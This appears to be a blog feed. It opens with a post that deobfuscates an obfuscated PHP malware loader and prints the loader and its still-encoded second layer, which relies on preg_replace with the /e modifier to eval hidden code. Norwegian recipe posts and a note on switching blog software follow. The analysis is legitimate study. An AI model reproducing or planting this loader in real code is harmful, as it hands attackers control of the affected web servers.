$sjeykdhzzn = explode(
      chr((238-194)),
      '<long string of numbers separated by comma>'
      );

$jekjvzbupt=substr($fognhntadd,(67419-57313),(30-23));

if (!function_exists('otmxvqaaam')) {
  function otmxvqaaam($kruvavlbfw, $tmpdlccpfv) {
      $knpzekviot = NULL;
      for ($mektnikgre=0; $mektnikgre<(sizeof($kruvavlbfw)/2); $mektnikgre++) {
      $knpzekviot .= substr($tmpdlccpfv,
              $kruvavlbfw[($mektnikgre*2)],
              $kruvavlbfw[($mektnikgre*2)+1]
              );
      }
      return $knpzekviot;
  };
}

$wrewusbqxp="<long string of hex-escaped text>";
$flwwfkzecg=substr($fognhntadd,(50154-40041),(83-71));
$flwwfkzecg($jekjvzbupt, $wrewusbqxp, NULL);
$flwwfkzecg=$wrewusbqxp;
$flwwfkzecg=(419-298);
$fognhntadd=$flwwfkzecg-1;

?>

Let’s see if we can make the code a bit more readable:

The $fognhntadd on line 1 is not code to be executed, but is there to be used by the rest of the code. We can’t really make it more readable at this point.

$sjeykdhzzn on line four appears to split its second argument on chr((238-194)). chr returns a one-character string containing the character specified by the decimal argument. chr(238-194) = chr(44), and a quick look in man ascii tells us that the ASCII character with a decimal value of 44 is , (comma). This means $sjeykdhzzn will evaluate to an array consisting of 456 (0-455) numbers, every other large (1000+) and small(<50).

$jekjvzbupt on line 9 is a substring of the horribly long $fognhntadd - but how to know what without counting to 10106? (67419-57313=10106).

The code does not appear to to anything dangerious, so let’s try to parse it using a PHP engine! google “run php code online”. The second result, sandbox.onlinephpfunctions.com looks promising.

Pasting in $fognhntadd, $jekjvzbupt and a var_dump, tells us that $jekjvzbupt evaluates to the string /(.*)/e. While i didn’t know at the time, if this string is used in preg_replace on a system using PHP prior to 5.5.x, it is basically the same as eval.

We will skip the function otmxvqaaam for now.

The escaped string $wrewusbqxp get the same treatment, and returns the following code:

1

 /* gzmcixrfif */ eval(str_replace(chr((183-146)), chr((361-269)), otmxvqaaam($sjeykdhzzn,$fognhntadd))); /* iakxdbcknr */ 

$flwwfkzecg evaluates to preg_replace, why am i not surprised?

Line 26 uses $flwwfkzecg as a function name, and can thus be written like this:

1

preg_replace('/(.*)/e', 'eval(str_replace(chr((183-146)), chr((361-269)), otmxvqaaam($sjeykdhzzn,$fognhntadd)));', NULL);

This can also be written like this, reusing the techniques used above:

1
2
3

$foo = otmxvqaaam($sjeykdhzzn, $fognhntadd);
$bar = str_replace('%', '\\', $foo); # '\\' => \
eval($bar);

Suddenly understanding the function otmxvqaaam defined on line 12 becomes interesting. After renaming some of the variables, the function becomes somewhat easier to read.

1
2
3
4
5
6
7
8
9

function otmxvqaaam($start_and_length_array, $string) {
  $return_value = NULL;
  for ($i=0; $i < (sizeof($start_and_length)/2); $i++) {
      $start = $start_and_length_array[($i*2)]
      $length = $start_and_length_array[($i*2)+1]
      $return_value .= substr($string, $start, $length);
  }
  return $return_value;
};

This function uses $start_and_length_array together with substr as a grille. The even number positions(0,2,4…) of the array are the positions in the ciphertext, while the odd (1,3,5…) positions are the lengths.

I concluded that the last three lines did nothing that was worth analyzing. We now have enough data to make the code easier to read.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

<?php
$fognhntadd = '<horribly long string of non-random characters>';

$sjeykdhzzn = array() {
  0 => "7526",
  1 => "20",
  ...
  454 => "2136",
  455 => "23" 
}

function otmxvqaaam($start_and_length_array, $string) {
  $return_value = NULL;
  for ($i=0; $i < (sizeof($start_and_length)/2); $i++) {
      $start = $start_and_length_array[($i*2)]
      $length = $start_and_length_array[($i*2)+1]
      $return_value .= substr($string, $start, $length);
  }
  return $return_value;
};

$foo = otmxvqaaam($sjeykdhzzn, $fognhntadd);
$bar = str_replace('%', '\\', $foo); # '\\' => \
eval($bar);

?>

Since the code up to this point does nothing active (exec, system, fwrite, …), we can replace eval with echo in our code, and get the following result:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

<?php
if((
  function_exists("\x6f\142\x5f\163\x74\141\x72\164") &&
      (!isset($GLOBALS["\x61\156\x75\156\x61"]))
  )) {

  $GLOBALS["\x61\156\x75\156\x61"]=1;

  function fjfgg($n){
    return chr(ord($n)-1);
  }

@error_reporting(0);

 preg_replace("\x2f\50\x2e\52\x29\57\x65","\x65\166\x61\154\x28\151\x6d\160\x6c\157\x64\145\x28\141\x72\162\x61\171\x5f\155\x61\160\x28\42\x66\152\x66\147\x67\42\x2c\163\x74\162\x5f\163\x70\154\x69\164\50\x22\134\x78\62\x35\165\x3a\146\x21\76\x21\50\x5c\x7825\x5c\x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<\x5c\x78e\x5c\x78b\x5c\x7825w:!>!\x5c\x78246767~6<Cw6<pd\x5c\x7825w6Z6<.5\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.4\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.3\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.2\x5c\x7860hA\x5c\x7827pd\x5c\x78256<C\x5c\x7827pd\x5c\x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf\x5c\x7827*&7-n\x5c\x7825)utjm6<\x5c\x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u\x5c\x78257>\x5c\x782f7&6|7**111127-K)ebfsX\x5c\x7827u\x5c\x7825)7fmji\x5c\x78786<C\x5c\x7827&6<*rfs\x5c\x78257-K)fujs\x5c\x7878X6<#o]o]Y\x5c\x78257;utpI#7>\x5c\x782f7rfs\x5c\x78256<#o]1\x5c\x782f20QUUI7jsv\x5c\x78257UFH#\x5c\x7827rfs\x5c\x78256~6<\x5c\x787fw6<*K)ftpmdXA6|7**197-2qj\x5c\x78257-K)udfoopdXA\x5c\x7822)7gj6<*QDU\x5c\x7860MPT7-NBFSUT\x5c\x7860LDPT7-UFOJ\x5c\x7860GB)fubfsdXA\x5c\x7827K6<\x5c\x787fw6*3qj\x5c\x78257>\x5c\x782272qj\x5c\x7825)7gj6<**2qj\x5c\x7825)hopm3qjA)qj3hopmA\x5c\x78273qj\x5c\x78256<*Y\x5c\x7825)fnbozcYufhA\x5c\x78272qj\x5c\x78256<^#zsfvr#\x5c\x785cq\x5c\x78257\x5c\x782f7#@#7\x5c\x782f7^#iubq#\x5c\x785cq\x5c\x7825\x5c\x7827jsv\x5c\x78256<C>^#zsfvr#\x5c\x785cq\x5c\x78257**^#zsfvr#\x5c\x785cq\x5c\x7825)ufttj\x5c\x7822)gj6<^#Y#\x5c\x785cq\x5c\x7825\x5c\x7827Y\x5c\x78256<.msv\x5c\x7860ftsbqA7>q\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#fubfsdXk5\x5c\x7860{66~6<&w6<\x5c\x787fw6*CW&)7gj6<*doj\x5c\x78257-C)fepmqnjA\x5c\x7827&6<.fmjgA\x5c\x7827doj\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#fmjgk4\x5c\x7860{6~6<tfs\x5c\x7825w6<\x5c\x787fw6*CWtfs\x5c\x7825)7gj6<*id\x5c\x7825)ftpmdR6<*id\x5c\x7825)dfyfR\x5c\x7827tfs\x5c\x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv\x5c\x78257-MSV,6<*)ujojR\x5c\x7827id\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#ujojRk3\x5c\x7860{666~6<&w6<\x5c\x787fw6*CW&)7gj6<.[A\x5c\x7827&6<\x5c\x787fw6*\x5c\x787f_*#[k2\x5c\x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd\x5c\x7860ufh\x5c\x7860fmjg}[;ldpt\x5c\x7825}K;\x5c\x7860ufldpt}X;\x5c\x7860msvd}R;*msv\x5c\x7825)}.;\x5c\x7860UQPMSVD!-id\x5c\x7825)uqpuft\x5c\x7860msvd},;uqpuft\x5c\x7860msvd}+;!>!}\x5c\x7827;!>>>!}_;gvc\x5c\x7825}&;ftmbg}\x5c\x787f;!osvufs}w;*\x5c\x787f!>>\x5c\x7822!pd\x5c\x7825)!gj}Z;h!opjudovg}{;#)tutjyf\x5c\x7860opjudovg)!gj!|!*msv\x5c\x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j\x5c\x7825-bubE{h\x5c\x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j\x5c\x7825>j\x5c\x7825!*3!\x5c\x7827!hmg\x5c\x7825!)!gj!<2,*j\x5c\x7825!-#1]#-bubE{h\x5c\x7825)tpqsut>j\x5c\x7825!*72!\x5c\x7827!hmg\x5c\x7825)!gj!<2,*j\x5c\x7825-#1]#-bubE{h\x5c\x7825)tpqsut>j\x5c\x7825!*9!\x5c\x7827!hmg\x5c\x7825)!gj!~<ofmy\x5c\x7825,3,j\x5c\x7825>j\x5c\x7825!<**3-j\x5c\x7825-bubE{h\x5c\x7825)sutcvt-#w#)ldbqov>*ofmy\x5c\x7825)utjm!|!*5!\x5c\x7827!hmg\x5c\x7825)!gj!|!*1?hmg\x5c\x7825)!gj!<**2-4-bubE{h\x5c\x7825)sutcvt)esp>hmg\x5c\x7825!<12>j\x5c\x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h\x5c\x7825)sutcvt)!gj!|!*bubE{h\x5c\x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf\x5c\x7860opjudovg\x5c\x7822)!gj}1~!<2p\x5c\x7825\x5c\x787f!~!<##!>!2p\x5c\x7825Z<^2\x5c\x785c2b\x5c\x7825!>!2p\x5c\x7825!*3>?*2b\x5c\x7825)gpf{jt)!gj!<*2bd\x5c\x7825-#1GO\x5c\x7822#)fepmqyfA>2b\x5c\x7825!<*qp\x5c\x7825-*.\x5c\x7825)euhA)3of>2bd\x5c\x7825!<5h\x5c\x7825\x5c\x782f#0#\x5c\x782f*#npd\x5c\x782f#)rrd\x5c\x782f#00;quui#>.\x5c\x7825!<***f\x5c\x7827,*e\x5c\x7827,*d\x5c\x7827,*c\x5c\x7827,*b\x5c\x7827)fepdof.)fepdof.\x5c\x782f#@#\x5c\x782fqp\x5c\x7825>5h\x5c\x7825!<*::::::-111112)eobs\x5c\x7860un>qp\x5c\x7825!|Z~!<##!>!2p\x5c\x7825!|!*!***b\x5c\x7825)sf\x5c\x7878pmpusut!-#j0#!\x5c\x782f!**#sfmcnbs+yfeobz+sfwjidsb\x5c\x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!\x5c\x782f!#0#)idubn\x5c\x7860hfsq)!sp!*#ojneb#-*f\x5c\x7825)sf\x5c\x7878pmpusut)tpqssutRe\x5c\x7825)Rd\x5c\x7825)Rb\x5c\x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT\x5c\x7860QIQ&f_UTPI\x5c\x7860QUUI&e_SEEB\x5c\x7860FUPNFS&d_SFSFGFS\x5c\x7860QUUI&c_UOFHB\x5c\x7860SFTV\x5c\x7860QUUI&b\x5c\x7825!|!*)323zbek!~!<b\x5c\x7825\x5c\x787f!<X>b\x5c\x7825Z<#opo#>b\x5c\x7825!*##>>X)!gjZ<#opo#>b\x5c\x7825!**X)ufttj\x5c\x7822)gj!|!*nbsbq\x5c\x7825)323ldfidk!~!<**qp\x5c\x7825!-uyfu\x5c\x7825)3of)fepdof\x5c\x786057ftbc\x5c\x787f!|!*uyfu\x5c\x7827k:!ftmf!}Z;^nbsbq\x5c\x7825\x5c\x785cSFWSFT\x5c\x7860\x5c\x7825}X;!sp!*#opo#>>}R;msv}.;\x5c\x782f#\x5c\x782f#\x5c\x782f},;#-#}+;\x5c\x7825-qp\x5c\x7825)54l}\x5c\x7827;\x5c\x7825!<*#}_;#)323ldfid>}&;!osvufs}\x5c\x787f;!opjudovg}k~~9{d\x5c\x7825:osvufs:~928>>\x5c\x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf\x5c\x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm\x5c\x7825:-5ppde:4:|:**#ppde#)tutjyf\x5c\x78604\x5c\x78223}!+!<+{e\x5c\x7825+*!*+fepdfe{h+{d\x5c\x7825)+opjudovg+)!gj+{e\x5c\x7825!osvufs!*!+A!>!{e\x5c\x7825)!>>\x5c\x7822!ftmbg)!gj<*#k#)usbut\x5c\x7860cpV\x5c\x787f\x5c\x787f\x5c\x787f\x5c\x787f<u\x5c\x7825V\x5c\x7827{ftmfV\x5c\x787f<*X&Z&S{ftmfV\x5c\x787f<*XAZASV<*w\x5c\x7825)ppde>u\x5c\x7825V<#65,47R25,d7R17,67R37,#\x5c\x782fq\x5c\x7825>U<#16,47R57,27R66,#\x5c\x782fq\x5c\x7825>2q\x5c\x7825<#g6R85,67R37,18R#>q\x5c\x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w\x5c\x7825)kV\x5c\x7878{**#k#)tutjyf\x5c\x7860\x5c\x7878\x5c\x7822l:!}V;3q\x5c\x7825}U;y]}R;2]},;osvufs}\x5c\x7827;mnui}&;zepc}A;~!}\x5c\x787f;!|!}{;)gj}l;33bq}k;opjudovg}\x5c\x7878;0]=])0#)U!\x5c\x7827{**u\x5c\x7825-#jt0}Z;0]=]0#)2q\x5c\x7825l}S;2-u\x5c\x7825!-#2#\x5c\x782f#\x5c\x7825#\x5c\x782f#o]#\x5c\x782f*)323zbe!-#jt0*?]+^?]_\x5c\x785c}X\x5c\x7824<!\x5c\x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!\x5c\x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<\x5c\x7825tmw!>!#]y84]275]y83]273]y76]277#<\x5c\x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!\x5c\x7825tww!>!\x5c\x782400~:<h\x5c\x7825_t\x5c\x7825:osvufs:~:<*9-1-r\x5c\x7825)s\x5c\x7825>\x5c\x782fh\x5c\x7825:<**#57]38y]47]67y]37]88y]27]28y]#\x5c\x782fr\x5c\x7825\x5c\x782fh\x5c\x7825)n\x5c\x7825-#+I#)q\x5c\x7825:>:r\x5c\x7825:|:**t\x5c\x7825)m\x5c\x7825=*h\x5c\x7825)m\x5c\x7825):fmji\x5c\x7878:<##:>:h\x5c\x7825:<#64y]552]e7y]#>n\x5c\x7825<#372]58y]472]37y]672]48y]#>s\x5c\x7825<#462]47y]252]18y]#>q\x5c\x7825<#762]67y]562]38y]572]48y]#>m\x5c\x7825:|:*r\x5c\x7825:-t\x5c\x7825)3of:opjudovg<~\x5c\x7824<!\x5c\x7825o:!>!\x5c\x78242178}527}88:}334}472\x5c\x7824<!\x5c\x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x5c\x7825ff2!>!bssbz)\x5c\x7824]25\x5c\x7824-\x5c\x7824-!\x5c\x7825\x5c\x7824-\x5c\x7824*!|!\x5c\x7824-\x5c\x7824\x5c\x785c\x5c\x7825j^\x5c\x7824-\x5c\x7824tvctus)\x5c\x7825\x5c\x7824-\x5c\x7824b!>!\x5c\x7825yy)#}#-#\x5c\x7824-\x5c\x7824-tusqpt)\x5c\x7825z-#:#*\x5c\x7824-\x5c\x7824!>!tus\x5c\x7860sfqmbdf)\x5c\x7825\x5c\x7824-\x5c\x7824y4\x5c\x7824-\x5c\x7824]y8\x5c\x7824-\x5c\x7824]26\x5c\x7824-\x5c\x7824<\x5c\x7825j,,*!|\x5c\x7824-\x5c\x7824gvodujpo!\x5c\x7824-\x5c\x7824y7\x5c\x7824-\x5c\x7824*<!\x5c\x7824-\x5c\x7824gps)\x5c\x7825j>1<\x5c\x7825j=tj{fpg)\x5c\x7825\x5c\x7824-\x5c\x7824*<!~!dsfbuf\x5c\x7860gvodujpo)##-!#~<#\x5c\x782f\x5c\x7825\x5c\x7824-\x5c\x7824!>!fyqmpef)#\x5c\x7824*<!\x5c\x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!\x5c\x7825t::!>!\x5c\x7824Ypp3)\x5c\x7825cB\x5c\x7825iN}#-!tussfw)\x5c\x7825c*W\x5c\x7825eN+#Qi\x5c\x785c1^W\x5c\x7825c!>!\x5c\x7825i\x5c\x785c2^<!Ce*[!\x5c\x7825cIjQeTQcOc\x5c\x782f#00#W~!Ydrr)\x5c\x7825r\x5c\x7878Bsfuvso!sboepn)\x5c\x7825epnbss-\x5c\x7825r\x5c\x7878W~!Ypp2)\x5c\x7825zB\x5c\x7825z>!tussfw)\x5c\x7825zW\x5c\x7825h>EzH,2W\x5c\x7825wN;#-Ez-1H*WCw*[!\x5c\x7825rN}#QwTW\x5c\x7825hIr\x5c\x785c1^-\x5c\x7825r\x5c\x785c2^-\x5c\x7825hOh\x5c\x782f#00#W~!\x5c\x7825t2w)##Qtjw)#]82#-#!#-\x5c\x7825tmw)\x5c\x7825tww**WYsboepn)\x5c\x7825bss-\x5c\x7825r\x5c\x7878B\x5c\x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-\x5c\x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#\x5c\x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<\x5c\x7825tpz!>!#]D6M7]K3#<\x5c\x7825yy>#]D6]281L1#\x5c\x782f#M5]DgP5]D6#<\x5c\x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<\x5c\x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<\x5c\x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<\x5c\x7825bG9}:}.}-}!#*<\x5c\x7825nfd>\x5c\x7825fdy<Cb*[\x5c\x7825h!>!\x5c\x7825tdz)\x5c\x7825bbT-\x5c\x7825bT-\x5c\x7825hW~\x5c\x7825fdy)##-!#~<\x5c\x7825h00#*<\x5c\x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-\x5c\x7825tdz*Wsfuvso!\x5c\x7825bss\x5c\x785csboe))1\x5c\x782f35.)1\x5c\x782f14+9**-)1\x5c\x782f2986+7**^\x5c\x782f\x5c\x7825r\x5c\x7878<~!!\x5c\x7825s:N}#-\x5c\x7825o:W\x5c\x7825c:>1<\x5c\x7825b:>1<!gps)\x5c\x7825j:>1<\x5c\x7825j:=tj{fpg)\x5c\x7825s:*<\x5c\x7825j:,,Bjg!)\x5c\x7825j:>>1*!\x5c\x7825b:>1<!fmtf!\x5c\x7825b:>\x5c\x7825s:\x5c\x785c\x5c\x7825j:.2^,\x5c\x7825b:<!\x5c\x7825c:>\x5c\x7825s:\x5c\x785c\x5c\x7825j:^<!\x5c\x7825w\x5c\x7860\x5c\x785c^>Ew:Qb:Qc:W~!\x5c\x7825z!>2<!gps)\x5c\x7825j>1<\x5c\x7825j=6[\x5c\x7825ww2!>#p#\x5c\x782f#p#\x5c\x782f\x5c\x7825z<jg!)\x5c\x7825z>>2*!\x5c\x7825z>3<!fmtf!\x5c\x7825z>2<!\x5c\x7825ww2)\x5c\x7825w\x5c\x7860TW~\x5c\x7824<\x5c\x78e\x5c\x78b\x5c\x7825mm)\x5c\x7825\x5c\x7878:-!\x5c\x7825tzw\x5c\x782f\x5c\x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*\x5c\x7824\x5c\x782f\x5c\x7825kj:-!OVMM*<(<\x5c\x78e\x5c\x78b\x5c\x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!\x5c\x7825ggg)(0)\x5c\x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<\x22\51\x29\51\x29\73", NULL);
}
?>

Oh joy! Another layer of obfuscation. I can’t wait for part 2!

Hola!

Cinco de Mayo er snart rundt hjørnet. Selv om du nødvendigvis verken er i eller fra Puebla (eller California for den saks skyld..) så er meksikansk mat ofte en slager  fordetom. Det er det i hvert fall her i huset. Pico de Gallo er en slags salsa eller salat. Den brukes oftest som tilbehør til ymse matretter, men det er absolutt ingenting i veien for å bruke den sammen f.eks tortillachips om du er en sånn som spiser det!  Her er min versjon av den:

Du trenger følgende:

• Fire til seks plommetomater
• En finfinhakket løk
• Ett til to finfinhakkede hvitløksfedd
• Sju, åtte ringer syltede jalapeños (eller en liten fersk) – hakket
• En halv gul paprika
• Saften fra den største limen du finner
• Salt/pepper etter smak
• Nesten en hel busk finhakket koriander

Hakk, bland og la stå en halvtime, time før servering. Jeg velger i dag å spise den til pulled pork og coleslaw – hva med deg?

Sooooo, i got kinda tired of wordpress, and felt like testing something static, and a little closer to my terminal.

Enter Octopress …

Ja ok, jeg innrømmer at det kanskje høres litt ekkelt rart ut. Men hear me out. DET ER SÅ GODT!! Jeg bare elsker slow cookeren jeg (vi) fikk til jul, og den får kjørt seg stadig vekk. Søndagsmiddag er blitt synonymt med slow cooker-middag f.eks. Jeg har ikke kreert denne oppskrifta selv, men jeg har ærlig og redelig kopiert, justert litt og oversatt den.  Ikke er bildene mine heller. Alt er hentet fra popularpaleo.com. 

Du trenger følgende:

• 4-6 kyllingbryst
• 6 rå pølser uten tull i (jeg brukte fire av Meny sine egne)
• En stor løk i tynne ringer
• 4-6 hvitløksfedd, hakkede
• Olivenolje
• 1 ts «italiensk krydderblanding» – eller bare litt av de tre store: timian, basilikum og rosmarin
• 1 ts hvitløkspulver
• 1 ts salt
• 2 bokser hakkede tomater 
• 2,4 dl kyllingkraft
• 4-5 ss balsamico (jeg brukte en kremete type, men du bruker selvsagt hva du vil)
• en ny runde av det tørre krydderet med samme mål

Slik gjør du:

Legg kyllingbrystene nederst i slow cookeren, ha over det du synes er en passende mengde olivenolje. Dryss over den første runden med tørt krydder. Ikke bland noe, bare hell det over i rekkefølge. Dette gjelder absolutt alt i hele oppskrifta. IKKE bland, bare legg alt lagvis. OK? Fint. Så putter du oppi pølsene og lar de ligge pent før du dekker over med løk og hvitløk. Hell over kraft, tomatguffa og balsamicoen. Krydre på topp med runde to av det tørre krydderet. Sånn – nå legger du på lokket og setter slow cookeren på high og venter i fem timer. Spis gjerne zoodles til!

Som du ser har jeg stjålet bildene. Herfra for å være helt oppriktig.